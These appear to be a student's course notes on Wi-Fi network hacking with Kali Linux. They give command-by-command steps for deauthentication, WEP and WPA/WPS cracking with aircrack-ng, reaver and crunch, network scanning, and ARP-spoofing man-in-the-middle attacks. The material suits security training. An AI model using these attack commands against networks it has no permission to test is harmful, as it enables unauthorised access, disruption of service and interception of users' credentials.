LAB SETUP

Steps

• Enable virtualization in win 10/11
• Task Manager -> Performance -> check whether virtualization enable or not
• If not enabled, goto BIOS and check any of these options (VT-x,AMD-V,SVM,Vanderpool) available or not and if found enable it
• VirtualBox and KALI Linux Install
• Install terminator

    # apt-get install terminator

Network Hacking - Wi-Fi

Steps

• Pre-connections attacks
• Gaining access
• Post connection attacks

Cracking types

• Gaining Access -> WEP Cracking
• Gaining access -> WPA2 Cracking

Wi-Fi adapter requirements

• Monitor mode
• AP mode
• Packet Injection

Wi-Fi adapter - recommended

• Realtake RTL8812AU , Atheros AR9271
• AP mode

Wi-Fi adapter - setup in virtualBox

• Enable USB 1.1
• Check with this command for wlan0 interface

    # ifconfig

MAC change

What it is?

• Media Access Control Address
• Permenant , Physical , Unique
• Format : XX:XX:XX:XX:XX:XX

Why change?

• Increase anonymity
• Impersonate other device
• Bypass Filter

How to change?

• ether is the MAC id

    # ifconfig
    # ifconfig wlan0 down
    # ifconfig wlan0 hw ether 00::11::22::33::44::55
    # ifconfig wlan0 up
    # ifconfig 

• Changes only done in the current machine.Not in Physical device

Wi-Fi mode change

Modes

• Managed - Capture packets that destination MAC is same as device
• Monitor - Capture all packets

How to change?

• It ispossible if ond only if the adapter support the monitor mode

    # ifconfig
    # ifconfig wlan0 down
    // Kill currently running processes that using wlan0 interface
    # airmon-ng check kill
    # iwconfig wlan0 mode monitor

is this adapter support monitor mode?

• Check the chipset model

    # lsusb -vv
    # airmon-ng start wlan0

Packet Sniffing

Wi-Fi BANDS

• Data can be sniffed from a certain band if the wireless adapter used supports that band.
• Clients need to support band used by router to communiate with it.
• a - 5GHZ
• b,g - 2.4GHz
• n - 5 and 2.4 GHz
• ac - < 6 Ghz

In Windows - Microsoft Network Monitor

• Download Microsoft Network Monitor
• Install & Run as Administrator
• New capture
• Capture settings - wi-fi
• Start

use AIRODUMP-NG

• Part of aircrack-ng suit
• Capture all packets within range
• Detailed info about network around us
• Connected clients

    # iwcofig

    // mon0 - The name of the interface that is in monitor mode.
    # airodump-ng mon0

    // Get 5GHz also
    # airodump-ng --band a mon0

    // Get 2.4 and 5 GHz also
    # airodump-ng --band abg mon0

    // pass - (BSSID & CH) ,  write to file
    # airodump-ng --bssid 00::11::22::33::44::55 --channel 2 --write test mon0
    
    // Run wireshark and open the test-01.cap file and check the data.
    # wireshark

Deauthentication Attack

What?

• Disonnect any client from any network
• Works on encrypted network(WEP,WPA&WPA2)
• No need to know the network key
• No need to connect to the network
• Idea - The attacker pretends to be the client by changing the mac address to the client and telling to the router to disconnect. Then again, the attacker pretends to be the router by changing the mac address to the router and telling the client that your disconnect request succeeded.

USE AIRPLAY-NG

    // a - target / router , c - client , 100000000 - no of packets
    # aireplay-ng --deauth 100000000 -a F8:23:B2:B9:50:AB -c F9:24:B3:B0:51:AC mon0

    // In another terminal
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 mon0
        

WEP Cracking (Gaining Access )

About?

• Wired Equivalent Privacy
• Old encryption
• RC4 - algorithm
• Still uses in some networks. can be cracked easily
• client/router - send/recieve - encrypt/decrypt packets by using a key

Vulnerability?

• Each packet is encrypted using a unique key stream
• Random initialization vector(IV) is used to generate the keys streams
• IV is only 24 bits
• IV + key(password) = key stream
• client/router - send/recieve - encrypt/decrypt packets by using a key
• IV is sent in plaintext
• IV will repeat on busy networks. This makes WEP vulnerable to statistical attacks
• Repeated IV can be used to determine the key stream and break the encryption

AIRODUMP-NG & aircrack-ng

• Capture a large number of packets / IVs
• Analyse the captured IVs and crack the key

    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write basic_wep mon0

    // To crack key
    # aircrack-ng basic_wep-01.cap

• Copy the key and remove all columns - this is the password of Wi-Fi
• Problem - If network not busy, It would take some time to capture enough IVs
• Solution - Force the AP to generate new IVs

Fake Authentication attack

• Force the AP to generate new IVs

    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write arpreplay mon0

    // a - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --fakeauth 0 -a F9:24:B3:B0:51:AC -h F2:34:B4:B0:61:BC mon0

    // To crack key
    # aircrack-ng arpreplay-01.cap

ARP Request Replay attack

• Force the AP to generate new IVs
• Wait for an ARP packet , capture it and replay(retransmit) it
• This causes the AP to produce another packet with a new IV
• Keep doing this till we have enough IVs to crack the key

    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write arpreplay mon0

    // b - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --arpreplay -b F9:24:B3:B0:51:AC -h F2:34:B4:B0:61:BC mon0

    // To crack key
    # aircrack-ng arpreplay-01.cap

WPA / WPA 2 Cracking

About?

• Both can be cracked using the same methods
• Made to address the issue in WEP
• Much more secure
• Each packet is encrypted using a unique temporary key

Vulnerability?

• WPS is a feature that can be used with WPA&WPA2
• Allows clients to connect without the password
• Authentication is done using an 8 digit pin
• 8 digits is very small, we can try all possible pins in relatively short time. Then the wps pin can be used to compute the actual password.
• This only works if the router is configured not to use PBC (Push Button Authentication)

Reaver - use if WPS enabled

• Find the devices with WPS enabled and attack

    // collect packets
    # wash --interface mon0

    // b - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --fakeauth 30 -a F9:24:B3:B0:51:AC -h F2:34:B4:B0:61:BC mon0

    // To crack key , vvv - more info
    # reaver --bssid F9:24:B3:B0:51:AC --channel 1 --interface mon0 -vvv 

Wordlist attack - use if WPS disabled

• Only packets that can aid with the cracking process are the handshake packets
• Need to wait for a client connection to the target AP
• Can use deauthentication attack for a client connection
• Capture the 4-way handshake

    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write wpa_handshake mon0

    // b - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --deauth 4 -a F9:24:B3:B0:51:AC -c F2:34:B4:B0:61:BC mon0

• The handshake does not contain data that helps recover the key.
• It contains data that can be used to check if a key is valid or not.
• Create a wordlist of password and check the password valid or not

    // To create a wordlist
    // crunch [min][max][charactres] -t [pattern] -o [filename]
    # crunch 6 8 123abc$ -o wordlist -t a@@@@b

• The password and handshake-packets data combine and generate MIC code then check match with MIC within the packet.

    // To get the password
    # aircrack-ng wpa_handshake-01.cap -w test.txt

Post connection attacks

About?

• Work against WiFi & Ethernet
• Gather more info
• Intercept data(username & password)
• Modify data on the fly
• Display all devices on the network
• Display theri : IP,MAC,OS,Open ports, Running services.

Net discover

• Display all devices on the network

    // find your IP (eg : 10.0.2.16)
    # ifconfig

    // To Display all devices on the network
    # netdiscover -r 10.0.2.1/24

Nmap / Zenmap

• Huge security scanner
• From an Ip/Ip range it can dicover : Open ports, Running services, OS, Connected cients
• Find the ports and running services. Check the vulnerabilities of that services (check with version) and hack it!

    // find your IP (eg : 10.0.2.16)
    # ifconfig

    // To Display all devices on the network
    # netdiscover -r 10.0.2.1/24

MITM - Man In The Mddle Attack (POST CA)

ARP Poisoning

• victim <--> requests/responses <--> Hacker <--> requests/responses <--> Access point <--> internet
• ARP - link MAC & IP
• hacker send "I am at 10.0.0.3 (IP of victim)" to AP
• hacker send "I am at 10.0.0.6" (IP of AP) to victim
• Why its possible ? clients accept responses even if they did not send a request & clients trust response without any form of verification.

ARP Spoofing - use ARPSPOOF

• simple and reliable
• ported to most os

            // arpspoof -i [interface] -t [clientIP] [gatewayIP]
            // arpspoof -i [interface] -t [gatewayIP] [clientIP]
            
            # arpspoof -i eth0 -t 10.0.2.3 10.0.2.1
            # arpspoof -i eth0 -t 10.0.2.1 10.0.2.3

            // forward data to original destination
            # echo 1 > /proc/sys/net/ipv4/ip_forward